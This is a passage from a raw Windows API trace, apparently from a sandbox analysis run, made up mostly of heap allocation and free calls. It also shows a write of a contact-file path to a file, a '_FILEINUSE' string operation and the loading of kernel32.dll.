HALPmcxz\\Contacts\\Administrator.flyingship.contact\r\n", cchWideChar=74, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 74 [0074.879] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4a) returned 0x6d34d8 [0074.879] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.flyingship.contact\r\n", cchWideChar=74, lpMultiByteStr=0x6d34d8, cbMultiByte=74, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.flyingship.contact\r\n", lpUsedDefaultChar=0x0) returned 74 [0074.879] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab98 | out: hHeap=0x650000) returned 1 [0074.879] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x50) returned 0x6d3530 [0074.879] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6d34d8 | out: hHeap=0x650000) returned 1 [0074.879] WriteFile (in: hFile=0x128, lpBuffer=0x6d3530*, nNumberOfBytesToWrite=0x49, lpNumberOfBytesWritten=0x61eef4, lpOverlapped=0x0 | out: lpBuffer=0x6d3530*, lpNumberOfBytesWritten=0x61eef4*=0x49, lpOverlapped=0x0) returned 1 [0074.881] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6d3530 | out: hHeap=0x650000) returned 1 [0074.881] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908e0 | out: hHeap=0x650000) returned 1 [0074.881] CloseHandle (hObject=0x128) returned 1 [0074.882] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af88 | out: hHeap=0x650000) returned 1 [0074.882] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690810 | out: hHeap=0x650000) returned 1 [0074.882] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x771fe8 | out: hHeap=0x650000) returned 1 [0074.882] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8b38 | out: hHeap=0x650000) returned 1 [0074.882] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b420 | out: hHeap=0x650000) returned 1 [0074.882] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0074.882] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df40 | out: hHeap=0x650000) returned 1 [0074.882] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afd0 | out: hHeap=0x650000) returned 1 [0074.882] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b9e98 | out: hHeap=0x650000) returned 1 [0074.882] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690980 | out: hHeap=0x650000) returned 1 [0074.882] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b000 | out: hHeap=0x650000) returned 1 [0074.882] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac10 | out: hHeap=0x650000) returned 1 [0074.882] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d9c8 | out: hHeap=0x650000) returned 1 [0074.882] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0074.882] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b89b8 | out: hHeap=0x650000) returned 1 [0074.882] PeekMessageW (in: lpMsg=0x61f07c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f07c) returned 0 [0074.882] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b540 | out: hHeap=0x650000) returned 1 [0074.882] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b0d8 | out: hHeap=0x650000) returned 1 [0074.882] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d860 | out: hHeap=0x650000) returned 1 [0074.882] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690960 | out: hHeap=0x650000) returned 1 [0074.882] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d680 | out: hHeap=0x650000) returned 1 [0074.882] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x696a48 | out: hHeap=0x650000) returned 1 [0074.882] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690940 | out: hHeap=0x650000) returned 1 [0074.882] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76aee0 | out: hHeap=0x650000) returned 1 [0074.882] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76acb8 | out: hHeap=0x650000) returned 1 [0074.883] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b1b0 | out: hHeap=0x650000) returned 1 [0074.883] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690700 | out: hHeap=0x650000) returned 1 [0074.883] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68cff0 | out: hHeap=0x650000) returned 1 [0074.883] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ac70 | out: hHeap=0x650000) returned 1 [0074.883] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d838 | out: hHeap=0x650000) returned 1 [0074.883] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690790 | out: hHeap=0x650000) returned 1 [0074.883] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d6a8 | out: hHeap=0x650000) returned 1 [0074.883] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b168 | out: hHeap=0x650000) returned 1 [0074.883] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af70 | out: hHeap=0x650000) returned 1 [0074.883] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d748 | out: hHeap=0x650000) returned 1 [0074.883] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690800 | out: hHeap=0x650000) returned 1 [0074.883] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d630 | out: hHeap=0x650000) returned 1 [0074.883] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abf8 | out: hHeap=0x650000) returned 1 [0074.883] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab50 | out: hHeap=0x650000) returned 1 [0074.883] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad60 | out: hHeap=0x650000) returned 1 [0074.883] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690900 | out: hHeap=0x650000) returned 1 [0074.883] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d770 | out: hHeap=0x650000) returned 1 [0074.883] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af28 | out: hHeap=0x650000) returned 1 [0074.883] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b40 | out: hHeap=0x650000) returned 1 [0074.883] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a688 | out: hHeap=0x650000) returned 1 [0074.883] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abc8 | out: hHeap=0x650000) returned 1 [0074.883] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d6f8 | out: hHeap=0x650000) returned 1 [0074.883] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690660 | out: hHeap=0x650000) returned 1 [0074.883] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d068 | out: hHeap=0x650000) returned 1 [0074.883] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad18 | out: hHeap=0x650000) returned 1 [0074.883] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690740 | out: hHeap=0x650000) returned 1 [0074.884] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d7c0 | out: hHeap=0x650000) returned 1 [0074.884] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ada8 | out: hHeap=0x650000) returned 1 [0074.884] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad78 | out: hHeap=0x650000) returned 1 [0074.884] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d888 | out: hHeap=0x650000) returned 1 [0074.884] PeekMessageW (in: lpMsg=0x61f2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f2d4) returned 0 [0074.884] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8978 | out: hHeap=0x650000) returned 1 [0074.884] PeekMessageW (in: lpMsg=0x61f2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f2d4) returned 0 [0074.884] PeekMessageW (in: lpMsg=0x61f2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61f2d4) returned 0 [0074.884] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690740 [0074.884] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690660 [0074.884] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d888 [0074.884] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0074.884] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d888 | out: hHeap=0x650000) returned 1 [0074.884] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690660 | out: hHeap=0x650000) returned 1 [0074.884] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d888 [0074.884] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x690660 [0074.884] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d7c0 [0074.884] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad78 [0074.884] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690b40 [0074.884] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690900 [0074.885] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690900 | out: hHeap=0x650000) returned 1 [0074.885] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ada8 [0074.885] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b40 | out: hHeap=0x650000) returned 1 [0074.885] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76ad18 [0074.885] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d068 [0074.885] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abc8 [0074.885] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690b40 [0074.885] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a688 [0074.885] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af28 [0074.885] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b540 [0074.885] PeekMessageW (in: lpMsg=0x61eeb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eeb4) returned 0 [0074.885] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690900 [0074.885] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d6f8 [0074.885] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad60 [0074.885] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690800 [0074.885] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab50 [0074.885] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690800 | out: hHeap=0x650000) returned 1 [0074.885] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abf8 [0074.885] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690800 [0074.885] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af70 [0074.885] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690800 | out: hHeap=0x650000) returned 1 [0074.886] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b168 [0074.886] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690800 [0074.886] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ac70 [0074.886] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690800 | out: hHeap=0x650000) returned 1 [0074.886] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b1b0 [0074.886] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690800 [0074.886] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76acb8 [0074.886] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690800 | out: hHeap=0x650000) returned 1 [0074.886] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76aee0 [0074.886] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690800 [0074.886] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b0d8 [0074.886] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690800 | out: hHeap=0x650000) returned 1 [0074.886] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ac10 [0074.886] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690800 [0074.886] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b000 [0074.886] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690800 | out: hHeap=0x650000) returned 1 [0074.886] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76afd0 [0074.886] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690800 [0074.886] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d770 [0074.886] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df40 [0074.887] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690790 [0074.887] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690790 | out: hHeap=0x650000) returned 1 [0074.887] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af88 [0074.887] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690790 [0074.887] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690790 | out: hHeap=0x650000) returned 1 [0074.887] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df40 | out: hHeap=0x650000) returned 1 [0074.887] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af88 | out: hHeap=0x650000) returned 1 [0074.887] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d770 | out: hHeap=0x650000) returned 1 [0074.887] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690800 | out: hHeap=0x650000) returned 1 [0074.887] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af88 [0074.887] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690800 [0074.887] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df40 [0074.887] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690800 | out: hHeap=0x650000) returned 1 [0074.887] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b420 [0074.887] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d6f8 | out: hHeap=0x650000) returned 1 [0074.887] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab98 [0074.887] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690800 [0074.887] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690800 | out: hHeap=0x650000) returned 1 [0074.887] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab68 [0074.887] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690800 [0074.887] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df70 [0074.887] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690800 | out: hHeap=0x650000) returned 1 [0074.887] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ae68 [0074.888] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690800 [0074.888] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690800 | out: hHeap=0x650000) returned 1 [0074.888] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e228 [0074.888] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690800 [0074.888] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76aa30 [0074.888] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690800 | out: hHeap=0x650000) returned 1 [0074.888] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76afe8 [0074.888] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690800 [0074.888] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690800 | out: hHeap=0x650000) returned 1 [0074.888] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ace8 [0074.888] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690800 [0074.888] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df28 [0074.888] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690800 | out: hHeap=0x650000) returned 1 [0074.888] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b270 [0074.888] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690800 [0074.888] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690800 | out: hHeap=0x650000) returned 1 [0074.888] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad30 [0074.888] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690800 [0074.888] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5e8 [0074.888] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690800 | out: hHeap=0x650000) returned 1 [0074.888] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x80) returned 0x696a48 [0074.888] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b420 | out: hHeap=0x650000) returned 1 [0074.888] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e480 [0074.888] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690800 [0074.888] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690800 | out: hHeap=0x650000) returned 1 [0074.889] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690800 [0074.889] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5d0 [0074.889] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0074.889] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e450 [0074.889] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690790 [0074.889] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690700 [0074.889] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abe0 [0074.889] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e450 | out: hHeap=0x650000) returned 1 [0074.889] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690790 | out: hHeap=0x650000) returned 1 [0074.889] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abe0 | out: hHeap=0x650000) returned 1 [0074.889] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690700 | out: hHeap=0x650000) returned 1 [0074.889] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d6f8 [0074.889] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690700 [0074.889] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abe0 [0074.889] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690790 [0074.889] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690940 [0074.889] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e450 [0074.889] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abe0 | out: hHeap=0x650000) returned 1 [0074.889] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690790 | out: hHeap=0x650000) returned 1 [0074.889] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e450 | out: hHeap=0x650000) returned 1 [0074.889] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690940 | out: hHeap=0x650000) returned 1 [0074.889] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690940 [0074.889] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e450 [0074.889] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690790 [0074.890] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690960 [0074.890] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abe0 [0074.890] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e450 | out: hHeap=0x650000) returned 1 [0074.890] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690790 | out: hHeap=0x650000) returned 1 [0074.890] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abe0 | out: hHeap=0x650000) returned 1 [0074.890] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690960 | out: hHeap=0x650000) returned 1 [0074.890] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690960 [0074.890] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abe0 [0074.890] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690790 [0074.890] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690980 [0074.890] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e450 [0074.890] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abe0 | out: hHeap=0x650000) returned 1 [0074.890] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690790 | out: hHeap=0x650000) returned 1 [0074.890] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e450 | out: hHeap=0x650000) returned 1 [0074.890] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690980 | out: hHeap=0x650000) returned 1 [0074.890] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690980 [0074.890] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e450 [0074.890] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690790 [0074.890] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690910 [0074.890] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abe0 [0074.890] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e450 | out: hHeap=0x650000) returned 1 [0074.890] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690790 | out: hHeap=0x650000) returned 1 [0074.890] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abe0 | out: hHeap=0x650000) returned 1 [0074.891] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690910 | out: hHeap=0x650000) returned 1 [0074.891] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690910 [0074.891] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abe0 [0074.891] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690790 [0074.891] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690810 [0074.891] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e450 [0074.891] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abe0 | out: hHeap=0x650000) returned 1 [0074.891] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690790 | out: hHeap=0x650000) returned 1 [0074.891] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e450 | out: hHeap=0x650000) returned 1 [0074.891] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690810 | out: hHeap=0x650000) returned 1 [0074.891] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690810 [0074.891] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e450 [0074.891] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690790 [0074.891] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6908e0 [0074.891] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abe0 [0074.891] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e450 | out: hHeap=0x650000) returned 1 [0074.891] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690790 | out: hHeap=0x650000) returned 1 [0074.891] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abe0 | out: hHeap=0x650000) returned 1 [0074.891] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6908e0 | out: hHeap=0x650000) returned 1 [0074.891] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6908e0 [0074.891] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abe0 [0074.891] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690790 [0074.891] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690770 [0074.891] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e450 [0074.892] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abe0 | out: hHeap=0x650000) returned 1 [0074.892] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690790 | out: hHeap=0x650000) returned 1 [0074.892] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e450 | out: hHeap=0x650000) returned 1 [0074.892] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690770 | out: hHeap=0x650000) returned 1 [0074.892] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76d30000 [0074.892] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e450 [0074.892] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690770 [0074.892] WideCharToMultiByte (in: CodePage=0x0, 